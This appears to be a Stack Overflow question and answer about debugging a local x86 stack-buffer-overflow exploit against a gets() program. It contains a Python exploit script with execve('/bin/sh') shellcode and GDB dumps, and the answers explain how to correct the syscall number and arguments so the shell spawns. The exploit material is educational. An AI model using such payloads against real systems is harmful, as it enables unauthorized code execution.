# Illegal Instruction when trying to get shell from a simple stackoverflow

Tags: assembly, x86, stack-overflow, buffer-overflow, shellcode

I'm trying to exploit the stack overflow vulnerability to get a shell. When i tried to run it, It shows illegal hardware instruction after executing the shellcode instead of giving a shell(error appears after `int x80`(syscall to give shell)).

Source code :

```
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>

int main(int argc, char **argv)
{
  char buffer[64];

  gets(buffer);
}
```

compiled with no stack cookie,nx disabled and aslr is off

Disassembly:

```
gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x080483c4 <+0>: push   ebp
   0x080483c5 <+1>: mov    ebp,esp
   0x080483c7 <+3>: and    esp,0xfffffff0
   0x080483ca <+6>: sub    esp,0x50
   0x080483cd <+9>: lea    eax,[esp+0x10]
   0x080483d1 <+13>:    mov    DWORD PTR [esp],eax
   0x080483d4 <+16>:    call   0x80482e8 <gets@plt>
   0x080483d9 <+21>:    leave  
   0x080483da <+22>:    ret    
End of assembler dump.
```

Stack after break point at 0x080483da(at ret instruction in above snippet) :

```
0000| 0xffffce6c --> 0xffffce76 --> 0x90909090 
0004| 0xffffce70 --> 0x90909090 
0008| 0xffffce74 --> 0x90909090 
0012| 0xffffce78 --> 0x90909090 
0016| 0xffffce7c --> 0x90909090 
0020| 0xffffce80 --> 0x90909090 
0024| 0xffffce84 --> 0x6850c031 
0028| 0xffffce88 ("//shh/bin\211\343PTS\260"...)
```

My Exploit Code:

```
#!/usr/bin/python

import struct

buff = "A"*76                                   # filled with A
return_address = struct.pack("I",0xffffce76)    # eip jumps on the nop slide(I've verified it)
nops = "\x90"*20
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x54\x53\xb0\x3b\x50\xcd\x80"
# shellcode is taken from http://shell-storm.org/shellcode/files/shellcode-749.php
print buff+return_address+nops+shellcode
```

shellcode in expanded form:

```
%define SYS_EXECV 59    
section .text

    global _start

    _start:
       xor eax, eax

       push eax

       push '//sh'
       push '/bin'

       mov ebx, esp

       push eax
       push esp
       push ebx
       mov al, SYS_EXECV
       push eax
       int 0x80
```

Dump after interrupt instruction:

```
 0xffffce8f:    add    BYTE PTR [eax],al
       0xffffce91:  mov    ebx,esp
       0xffffce93:  push   eax
       0xffffce94:  push   esp
       0xffffce95:  push   ebx
       0xffffce96:  mov    al,0x3b
       0xffffce98:  push   eax
       0xffffce99:  int    0x80
    => 0xffffce9b:  add    BYTE PTR [eax],al
       0xffffce9d:  adc    bl,bh
       0xffffce9f:  test   DWORD PTR [eax],0x7e000000
       0xffffcea5:  jmp    0x1b81:0xe46e26f6
       0xffffceac:  add    BYTE PTR [eax],al
       0xffffceae:  add    BYTE PTR [eax],al
       0xffffceb0:  add    BYTE PTR [eax],al
       0xffffceb2:  add    BYTE PTR [eax],al
       0xffffceb4:  add    BYTE PTR [eax],al
       0xffffceb6:  add    BYTE PTR [eax],al
       0xffffceb8:  add    DWORD PTR [eax],eax
       0xffffceba:  add    BYTE PTR [eax],al
       0xffffcebc:  adc    BYTE PTR [ebx+0x804],al
       0xffffcec2:  add    BYTE PTR [eax],al
       0xffffcec4:  xor    al,ah
       0xffffcec6:  (bad)  
       0xffffcec7:  mul    DWORD PTR [eax+0xf7fe88]
       0xffffcecd:  sar    bh,1
       0xffffcecf:  test   DWORD PTR [ecx],0x10000000
       0xffffced5:  add    DWORD PTR [eax+ecx*1],0x0
       0xffffced9:  add    BYTE PTR [eax],al
       0xffffcedb:  add    BYTE PTR [ecx],dh
       0xffffcedd:  add    DWORD PTR [eax+ecx*1],0xffffffc4
       0xffffcee1:  add    DWORD PTR [eax+ecx*1],0x1
       0xffffcee5:  add    BYTE PTR [eax],al
       0xffffcee7:  add    BYTE PTR [edi+ecx*8],al
       0xffffceea:  (bad)  
       0xffffceeb:  push   eax
       0xffffceed:  add    DWORD PTR [eax+ecx*1],0xffffffe0
       0xffffcef1:  add    DWORD PTR [eax+ecx*1],0xffffffa0
       0xffffcef5:  mov    dh,bh
       0xffffcef7:  idiv   esp
       0xffffcef9:  into   
       0xffffcefa:  (bad)  
       0xffffcefb:  call   FWORD PTR [eax]
       0xffffcefd:  fcos   
       0xffffceff:  test   DWORD PTR [ecx],0x7000000
```

Registers:

```
EAX  0x0
 EBX  0xffffce64 ◂— 'Linux'
 ECX  0xf7fb15a0 (_IO_2_1_stdin_) ◂— mov    byte ptr [eax], ah /* 0xfbad2088 */
 EDX  0xf7fb287c (_IO_stdfile_0_lock) ◂— 0
 EDI  0xf7fb1000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
 ESI  0xf7fb1000 (_GLOBAL_OFFSET_TABLE_) ◂— mov    al, 0x1d /* 0x1b1db0 */
 EBP  0x41414141 ('AAAA')
 ESP  0xffffce54 ◂— 0x3b /* ';' */
*EIP  0xffffce9b ◂— 0xfb100000
```

Comment: So which illegal instruction is it, exactly?  What is EIP, and what's in memory at that location?  Your dump doesn't seem to show that.

Comment: Oh, is `sys_execve()` returning an error so execution continues past your `int 0x80`?  Use `strace`.  But probably because you didn't pass `0` (or a pointer-to-`NULL`) for the other args of `execve`, so it probably returned with `-EFAULT`.  Look at `eax`.

Comment: But probably because you didn't pass 0 (or a pointer-to-NULL) for the other args of execve? -- >  How to do it (I'm not very good at them)?

Comment: Look at any working 32-bit x86 Linux shellcode and notice they xor-zero ecx and edx, because https://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-on-i386-and-x86-6.  `execve(2)` takes 3 args: http://man7.org/linux/man-pages/man2/execve.2.html  See especially the Notes section of the man page, where it explains that passing `NULL` instead of a pointer-to-NULL happens to work on Linux.

Answer (score 2):

`%define SYS_EXECV 59`: no, that's `__NR_oldolduname` in `unistd_32.h` (which is the one that applies for `int 0x80`).  `__NR_execve` is 59 for the x86-64 `syscall` ABI.  (`unistd_64.h`).  [What are the calling conventions for UNIX & Linux system calls on i386 and x86-64](https://stackoverflow.com/questions/2535989/what-are-the-calling-conventions-for-unix-linux-system-calls-on-i386-and-x86-6).

You also didn't pass anything for the 2nd two args [of `execve(const char *filename, char *const argv[], char *const envp[])`](http://man7.org/linux/man-pages/man2/execve.2.html).  ECX and EDX were probably non-zero but not valid pointers, so `sys_execve` would have returned `-EFAULT`.

Your register dump shows `EAX=0` because you made the wrong system call.  `oldolduname` (`eax=59/int 0x80`) is presumably an old version of `uname`, so it stored an old version of `struct utsname` on the stack, in the memory buffer pointed to by `ebx`.  And it did so successfully, so it returned `0` in EAX.

---

Use `strace` to see what system calls your code makes.

---

Your code might work if you add `xor ecx,ecx` and `xor edx,edx`, and change the system call number to `11` for `sys_execve`.